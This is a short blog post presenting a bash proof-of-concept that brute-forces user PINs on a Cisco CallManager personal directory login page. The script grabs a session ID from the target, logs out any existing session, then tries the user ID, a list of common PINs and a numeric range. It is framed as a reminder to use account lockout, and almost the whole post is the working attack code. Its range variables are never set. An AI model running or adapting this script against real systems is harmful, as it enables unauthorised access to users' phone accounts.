Paul Heneghan's Blog: PoC for Cracking Cisco PINs

As a follow up to the work done by Roberto SL here;

http://blog.malerisch.net/2012/10/callmanager-pin-bruteforce.html

I've gone ahead and wrote some quick-and-dirty PoC code for this. Might be useful as a tool to remind people to use account lockout thresholds...

1:  #!/bin/bash  
2:  echo "Cisco VoIP Phone Pin Cracker, 2015 PWH"  
3:    
4:  if [ "$#" -eq 0 ]; then  
5:       echo "Usage: $0 <ip> <user-id>"  
6:       exit  
7:  fi  
8:    
9:  userid=$2  
10:  ccmip=$1  
11:    
12:  echo -e "Targeting user id $userid on $ccmip\n"   
13:  echo "Checking if already logged in... "  
14:  curl "https://$ccmip/ccmpd/pdCheckLogin.do?name=undefined" -ks | grep -q 'Personal Address Book'  
15:    
16:  if [ `echo $?` -eq 0 ]; then  
17:                           echo -n "+ IP already logged in, logging out... "  
18:                           curl -ks `curl -ks "\`curl "https://$ccmip/ccmpd/pdCheckLogin.do?name=undefined" -ks | grep LogoutPage | cut -d\> -f2 | cut -d\< -f1\`" | grep logout | cut -d\> -f2 | cut -d\< -f1` > /dev/null  
19:                           echo "Done"  
20:                      else  
21:                           echo "+ IP not logged in, proceeding to crack $userid..."  
22:                      fi  
23:    
24:  echo -ne "Grabbing a SID... "  
25:  SID=`curl "https://$ccmip/ccmpd/pdCheckLogin.do?name=undefined" -ks | grep sid | cut -d\= -f2 | cut -d\< -f1`  
26:  echo $SID  
27:    
28:  function authattempt {  
29:                      curl -ks "https://$ccmip/ccmpd/login.do?sid=$SID&userid=$userid&pin=$1" | grep -q 'Login Unsuccessful'  
30:                      if [ `echo $?` -eq 0 ]; then  
31:                           echo -ne "$1 didn't work\\r"  
32:                      else  
33:                           echo "$1 worked         "  
34:                           exit  
35:                      fi  
36:  }  
37:    
38:  echo "Testing user-id as PIN... "  
39:  authattempt $userid  
40:  echo "Testing common PINs... "  
41:  authattempt 1234  
42:  authattempt 4321  
43:  authattempt 0000  
44:  authattempt 1111  
45:  authattempt 2222  
46:  authattempt 3333  
47:  authattempt 4444  
48:  authattempt 5555  
49:  authattempt 6666  
50:  authattempt 7777  
51:  authattempt 8888  
52:  authattempt 9999  
53:  authattempt 0123  
54:  echo "Bruteforcing range... "  
55:  seq -f "%04.f" $rangeBegin $rangeEnd | while read line; do authattempt $line; done   
56:

Thursday, 2 April 2015

PoC for Cracking Cisco PINs